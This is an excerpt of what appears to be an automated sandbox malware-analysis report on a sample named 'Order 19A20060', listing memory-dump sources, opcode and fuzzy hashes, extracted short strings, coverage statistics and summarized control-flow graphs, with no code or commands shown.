• Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
Similarity
• API ID:
• String ID: @x7$
• API String ID: 0-1287060012
• Opcode ID: a9658435d2b55e98f33f4151df43c396f43fbdd723060d3c86e8de0ecf75af53
• Instruction ID: 9116624e56472b626e8a56a74811409a4080d2311e2d567864c4cff32c07a5ab
• Opcode Fuzzy Hash: a9658435d2b55e98f33f4151df43c396f43fbdd723060d3c86e8de0ecf75af53
• Instruction Fuzzy Hash: 1EE1FAB4E101198FCB14DFA9C5809AEFBB2FF89304F248169E825AB356D735AD41CF60
Uniqueness
• Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q
                                                                              • API String ID: 0-1614139903
                                                                              • Opcode ID: 53767a3ccd3c0114d8f6fbcc8a8d49110c83977bb1f6117e9e9608753652cfde
                                                                              • Instruction ID: e51296cd1f1439bdd9b24a7ad13600236f0fdc1c49c31341b2d572fc86085855
                                                                              • Opcode Fuzzy Hash: 53767a3ccd3c0114d8f6fbcc8a8d49110c83977bb1f6117e9e9608753652cfde
                                                                              • Instruction Fuzzy Hash: F961E970A02209CFDB09DF7AE9416AEBBF3FB88304F14C529D0159B268EB789C55CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 77b6642328b8b4d3430a542522f9ff6506f46a60ae559fbab119bfe0a51d6760
                                                                              • Instruction ID: 11c82470b0d46fe11dcc23d2fbcef75bf5f071533c3d91cda9e27e18a0693a8f
                                                                              • Opcode Fuzzy Hash: 77b6642328b8b4d3430a542522f9ff6506f46a60ae559fbab119bfe0a51d6760
                                                                              • Instruction Fuzzy Hash: 8212B8B0401745CBE718EF25FC4C1993BB6BB4AB28F904209D1656F2E9DBB415CACF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 50ab8f1c166a3ecbf5b849c740f610189f22d035cbcb656ab20d7751736bd2d6
                                                                              • Instruction ID: 82b99cd83204ad93d4680d43787205feb5dbdaf47de2cadccc67902959827403
                                                                              • Opcode Fuzzy Hash: 50ab8f1c166a3ecbf5b849c740f610189f22d035cbcb656ab20d7751736bd2d6
                                                                              • Instruction Fuzzy Hash: 35E11BB4E102198FCB14DFA9C5809AEFBB2FF89304F248169E815AB356D730AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f28871a8b2be7bce3c70621adf4b333b244453a63bda35873d897c7f74ca8d4f
                                                                              • Instruction ID: 2ce5aeaa1514ce449897de2db281c8894b7192542a05a4dc783c6574969430f5
                                                                              • Opcode Fuzzy Hash: f28871a8b2be7bce3c70621adf4b333b244453a63bda35873d897c7f74ca8d4f
                                                                              • Instruction Fuzzy Hash: 75E11CB4E102198FCB14DFA9D5809AEFBB2FF89304F248169E815AB355D730AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 560b28e6665d423e422bd2774533c49b5272d2c0854563ce9eb944d644179847
                                                                              • Instruction ID: ede22efec2ae6dd1dd41a85a405b9980feacd01dbc7e80098dfcdf81c8a07c34
                                                                              • Opcode Fuzzy Hash: 560b28e6665d423e422bd2774533c49b5272d2c0854563ce9eb944d644179847
                                                                              • Instruction Fuzzy Hash: D7E1D9B4E101198FCB54DFA9C5809AEFBB2FF89304F248169E825AB356D735AD41CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e050a7d4105288c463fa8fd0c45fb60254e5eceb9b9549b419acaad991a3d7c
                                                                              • Instruction ID: 309e899aa17383bd1cdb75c328170b77d2623329c0f0789ef01bffa6e854f106
                                                                              • Opcode Fuzzy Hash: 5e050a7d4105288c463fa8fd0c45fb60254e5eceb9b9549b419acaad991a3d7c
                                                                              • Instruction Fuzzy Hash: F0E1F9B4E101198FCB54DFA9C5809AEFBB2FF89304F248169E815AB356DB31AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1c064fe290292ba28a8285608a3292e35d0d0d318356dfae424e5cbb35c48133
                                                                              • Instruction ID: c6db4aa6f8f557b48e81224ae9b5dd76ec146e4bcfde87b656dd885e66227e0b
                                                                              • Opcode Fuzzy Hash: 1c064fe290292ba28a8285608a3292e35d0d0d318356dfae424e5cbb35c48133
                                                                              • Instruction Fuzzy Hash: 15D1C63182075ADACB10EB65D990A9DB7B1FFD5340F10C7AAD10937221EB70AED9CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f0bbbea0fbb439c542ec715f4f439567b8c2636e343bb249260a97d5c8f06ae
                                                                              • Instruction ID: 3e33c5cdc326f9fea4faf388fa5e89de0994be41d0353f4b6880caf080c1d1bb
                                                                              • Opcode Fuzzy Hash: 7f0bbbea0fbb439c542ec715f4f439567b8c2636e343bb249260a97d5c8f06ae
                                                                              • Instruction Fuzzy Hash: 80D1C53182075ADACB10EB65D990A9DB7B1FFD5340F10C7AAD10937221EB70AED9CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05a40c7bd8f515a79f8e65df1bcc917d91ac06058012f6b36d490c35d6635aaa
                                                                              • Instruction ID: 01e5cfc273f9f2d8e16adebf33eadbb2798af163055e7b062dff106ae6422e1a
                                                                              • Opcode Fuzzy Hash: 05a40c7bd8f515a79f8e65df1bcc917d91ac06058012f6b36d490c35d6635aaa
                                                                              • Instruction Fuzzy Hash: C6A16D36E0120ACFDF19DFB5C4445EEB7B2FF84300B15856AE806AB2A5DB31D945CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: adfdb8d4cce81b8802ff1aa263bc24dcc1df67590d65110f68c582f0af920737
                                                                              • Instruction ID: 86e5c14a4843a439d25d14b55d60cb4d673d8a805896c0e6c227ce021a2c3703
                                                                              • Opcode Fuzzy Hash: adfdb8d4cce81b8802ff1aa263bc24dcc1df67590d65110f68c582f0af920737
                                                                              • Instruction Fuzzy Hash: D2C13BB0400745CBD718EF25EC481997BB7FB8AB28F544309D1616B2E9DBB815CACF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07efb60f5c6395ea7fa9b7522050463247557b7316e733f7329e0e01eecda06e
                                                                              • Instruction ID: 3bb194137103eb39cea55d9fb714f6faff1cb88b3e1e813da3d34e88ab4bba7a
                                                                              • Opcode Fuzzy Hash: 07efb60f5c6395ea7fa9b7522050463247557b7316e733f7329e0e01eecda06e
                                                                              • Instruction Fuzzy Hash: 565102B4E19209CFCF48DFAAD4445EEBBB5FB8A310F04D126E829A7211D7345985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b61877fec26512f3c0ebfafe1560b82b16e6e04442ec4da56a5d3254adabcb10
                                                                              • Instruction ID: a02f0a41a33df15f02ffdff6cbf3d161baf821a0ec6dcac2de3d396fdb92a548
                                                                              • Opcode Fuzzy Hash: b61877fec26512f3c0ebfafe1560b82b16e6e04442ec4da56a5d3254adabcb10
                                                                              • Instruction Fuzzy Hash: 5B513DB4E002198FCB14DFA9D9405AEFBF2FF89304F148169D419AB256D7319D42CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 21ffa624fb59ffa79e4f0745f01fa189cfaf20c609636dac549991bab9734705
                                                                              • Instruction ID: b496d332c6c256234fd2b2ba396d3d20e2056c9a4a0d946c295836671050e2d4
                                                                              • Opcode Fuzzy Hash: 21ffa624fb59ffa79e4f0745f01fa189cfaf20c609636dac549991bab9734705
                                                                              • Instruction Fuzzy Hash: 11413BB1D01A188BEB6CCF6B8D4079AFAF7BFC9201F14D1BAD40CAA255DB7049858F10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: da3cfa0943c9b67ee3f4cc991b8e2c67d033faf2cc67a23c8f2c2f91879f7d56
                                                                              • Instruction ID: cfffdaaf050ed6382136fd36f04000ab6078c0f0a847727c0d15418d39cab552
                                                                              • Opcode Fuzzy Hash: da3cfa0943c9b67ee3f4cc991b8e2c67d033faf2cc67a23c8f2c2f91879f7d56
                                                                              • Instruction Fuzzy Hash: 3D4104B1D01A189BEB5CCF6B9D4068AFAF3BFC9201F14C1BAD84CAA255EB3405458F51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e0fc4a6123e80aa2ff01e7a600aa968fa660e0c45811c6c0465bdd63b14d9f1
                                                                              • Instruction ID: da9c44564d087eb323989ac505e011a090aa2c009c58052f3e28116ef0c8538c
                                                                              • Opcode Fuzzy Hash: 7e0fc4a6123e80aa2ff01e7a600aa968fa660e0c45811c6c0465bdd63b14d9f1
                                                                              • Instruction Fuzzy Hash: 2111A4B1E016588BDB58CFABC8442DEFAF7BFC9300F04C12AD459AA258DB740446CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:12.3%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:45
                                                                              Total number of Limit Nodes:7

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 59a3d416659106ebfaa7a59ab070bc8781c9b9317cc8780b3a0f128f57b2fe37
                                                                              • Instruction ID: 93f78cd95eab0f3740de27005401d7ff7670b7e399b2a9f88a8edc3c6d0e1b75
                                                                              • Opcode Fuzzy Hash: 59a3d416659106ebfaa7a59ab070bc8781c9b9317cc8780b3a0f128f57b2fe37
                                                                              • Instruction Fuzzy Hash: D6323F31E1061A8FCB54EF75D95459DB7B6FFC9300F2486A9D409AB224EF30E986CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

control_flow_graph: function entered at 6a47d90 (basic blocks 6a47d90-6a483d2, two calls to 6a46598); rendered as a graph in the original report, edge list omitted here
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: 588af03f3748fb74898e6ee9a62e2fd2555a4a31a829cb2e346320ae50e66de2
                                                                              • Instruction ID: 531be711aa3239a621aa9ac0c59158174244dfe69adb7d037889f4d14610f846
                                                                              • Opcode Fuzzy Hash: 588af03f3748fb74898e6ee9a62e2fd2555a4a31a829cb2e346320ae50e66de2
                                                                              • Instruction Fuzzy Hash: C5029B30B002159FDB54EB69E990AAEB7E2FFC4300F148569D40ADB395DB35EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6f77f9ac5685d897eaa3018036ef55028b381545ec6aab156a389c484e6e7326
                                                                              • Instruction ID: db062929dd1920ac20e0b0ecf08a3289d5f36ca6d1b4da3473aa0c2784a3fd4e
                                                                              • Opcode Fuzzy Hash: 6f77f9ac5685d897eaa3018036ef55028b381545ec6aab156a389c484e6e7326
                                                                              • Instruction Fuzzy Hash: 68924634A002048FDB64EB68C984B6DB7F2FF84314F5585A9E849AF365DB35ED85CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d82ce255bbd5748401cd9aeabd2d6f4fa1a25cddf83a28d314ad73890d527e59
                                                                              • Instruction ID: 8bca084b78f9b8df7e197df9ee84b4f4735e8f151369c350c254be049155df5c
                                                                              • Opcode Fuzzy Hash: d82ce255bbd5748401cd9aeabd2d6f4fa1a25cddf83a28d314ad73890d527e59
                                                                              • Instruction Fuzzy Hash: F862AB34A002058FDB54FB68D984AADB7F2EFC9314F249569E41ADB395DB31EC46CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4fefa7693039a3982453c2d82a64425ed6a6f47df774b2816a404298f83becee
                                                                              • Instruction ID: 6bc041193d70146c280d4193a338cc02d8978bbd65b58361475f17aed74a9275
                                                                              • Opcode Fuzzy Hash: 4fefa7693039a3982453c2d82a64425ed6a6f47df774b2816a404298f83becee
                                                                              • Instruction Fuzzy Hash: 2422D035E102199FDF65EBA5C9806AEBBF2EF85310F248469D40AEF344DA31DC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e081dd2f20e4eba3d3eb8120382c7e73fddc7dbe37f15844e449ee110616c9c5
                                                                              • Instruction ID: 1730f5ebe683cf45a5cd5e6ddcf4a7a70d21a7fa4e72a02bf4d806d01326821b
                                                                              • Opcode Fuzzy Hash: e081dd2f20e4eba3d3eb8120382c7e73fddc7dbe37f15844e449ee110616c9c5
                                                                              • Instruction Fuzzy Hash: AC226030E101098BDF64FB6DD9907AEB7B6EBC5310F248925E409DF395DA35DC828BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: c4c2d6d4c603315c1c7f04dc2fa965680ab5521493bd0ed0f5fe4d721aab17b9
                                                                              • Instruction ID: 64d5a1d208c54ceee6e28fce885253f996679fea0b72259b677286a4aaeaea15
                                                                              • Opcode Fuzzy Hash: c4c2d6d4c603315c1c7f04dc2fa965680ab5521493bd0ed0f5fe4d721aab17b9
                                                                              • Instruction Fuzzy Hash: BBE19E30E0121A9FCB59EFA9D9806AEB7B2FFC5304F108929D5169B359DB30D846CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

control_flow_graph: function entered at 6a4b660 (basic blocks 6a4b660-6a4bce0, two calls to 6a46598); rendered as a graph in the original report, edge list omitted here
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 504983ecac4f032110680500a77218a5ed000d4058f6068b523f4799b104b735
                                                                              • Instruction ID: fd358f169d4f4de9d4978381a96e1257047c625a9eb51fe4af9e77987bbf01a8
                                                                              • Opcode Fuzzy Hash: 504983ecac4f032110680500a77218a5ed000d4058f6068b523f4799b104b735
                                                                              • Instruction Fuzzy Hash: 0F023C30E102098FDBA4FF69D9846ADB7B2FB85310F248566D409DF355DB31E886CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

control_flow_graph: function entered at 6a49160 (basic blocks 6a49160-6a49a8d, no calls); rendered as a graph in the original report, edge list omitted here
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 276f5af3961135ba54247129636ddf64a934f3a9c1f9726b73521873f14db3e5
                                                                              • Instruction ID: a09ffc3e1c0a4f964679f0fa8fe83ef9770c4787bbbe67677a37fe39f4f05a46
                                                                              • Opcode Fuzzy Hash: 276f5af3961135ba54247129636ddf64a934f3a9c1f9726b73521873f14db3e5
                                                                              • Instruction Fuzzy Hash: 77913034F0021A9FDB94EB65D8507AFB3F6AFC9244F108569C40AEB344EB70AD568B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

control_flow_graph: function entered at 6a4cf48 (basic blocks 6a4cf48-6a4daa8, calls to 6a4dabd and 6a46598); rendered as a graph in the original report, edge list omitted here
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q
                                                                              • API String ID: 0-831282457
                                                                              • Opcode ID: d7687e696433138da8fe46f26433ebc4a6d024e24f7d233447dcb20e7b1563df
                                                                              • Instruction ID: 01f643cafb0e77b73af868d0a0d7792ab93f115a35a6ad444107ed0b53d8a568
                                                                              • Opcode Fuzzy Hash: d7687e696433138da8fe46f26433ebc4a6d024e24f7d233447dcb20e7b1563df
                                                                              • Instruction Fuzzy Hash: 2E625230A0021A8FCB55FB69D990A5DB7F2FF84344F208A69D4099F359DB71ED4ACB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

control_flow_graph: function entered at 6a44b70 (basic blocks 6a44b70-6a452bb, call to 6a45418); rendered as a graph in the original report, edge list omitted here
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq$\Ocq
                                                                              • API String ID: 0-3575482020
                                                                              • Opcode ID: 607fdb5deb427059a9a3279faddf679ac3e89732a4aea907181472dde6d68781
                                                                              • Instruction ID: 16f529a66ca3eb5f3d829c05103d15ebf9c00594ed2bcee1fde33a05c18bec2b
                                                                              • Opcode Fuzzy Hash: 607fdb5deb427059a9a3279faddf679ac3e89732a4aea907181472dde6d68781
                                                                              • Instruction Fuzzy Hash: 12617F30F102199FEB55EFA5D8547AEBBF2FBC8340F20852AD506EB394DA718C458B51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph
                                                                              (Rendered graph, legend Executed / Not Executed, not reproduced.) 42 basic blocks spanning 6a4a330-6a4a65c, first listed block 6a4a3b8; call targets 6a42058 (three call sites) and 6a46598.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: X!@$x!@
                                                                              • API String ID: 0-2527372166
                                                                              • Opcode ID: e5b91e88333bc258f87926668cc4cbf0fda5db1b305b35dcfa06acb3d5b30e40
                                                                              • Instruction ID: a2eb074ea4009675b852db1dfd6ca26ea9088702df472f6513544c4b17dd8ebc
                                                                              • Opcode Fuzzy Hash: e5b91e88333bc258f87926668cc4cbf0fda5db1b305b35dcfa06acb3d5b30e40
                                                                              • Instruction Fuzzy Hash: A0819231B112159FCB54FBA8E9906ADB7B2EBC8310F108529E50AEB354EB31DD46CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph
                                                                              (Rendered graph, legend Executed / Not Executed, not reproduced.) 32 basic blocks spanning 6a49151-6a49a8d; no call targets.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: b22412036bbe8c5388ffcba298557fe73b887cba6b35b9f33c2ddc6f37d212e2
                                                                              • Instruction ID: 49c99f57f6ccedaa72c9776a307b971c9c07c69e779e8f8e6cb36d54adad55cc
                                                                              • Opcode Fuzzy Hash: b22412036bbe8c5388ffcba298557fe73b887cba6b35b9f33c2ddc6f37d212e2
                                                                              • Instruction Fuzzy Hash: 13514334F002169FDB54EB75D990BAFB3F6AFC9644F148569C40ADB388DA30DC528B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph
                                                                              (Rendered graph, legend Executed / Not Executed, not reproduced.) 18 basic blocks spanning 6a44b60-6a452bb; one call target, 6a45418.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq
                                                                              • API String ID: 0-936005338
                                                                              • Opcode ID: 6c795f28ca7208c327a92f166225f109f00e4380168f33bfcb417431d9f082f0
                                                                              • Instruction ID: efbb7437e65188e2f54cf9f551e74f7664808621464ba8da47e73bf9ec9342ab
                                                                              • Opcode Fuzzy Hash: 6c795f28ca7208c327a92f166225f109f00e4380168f33bfcb417431d9f082f0
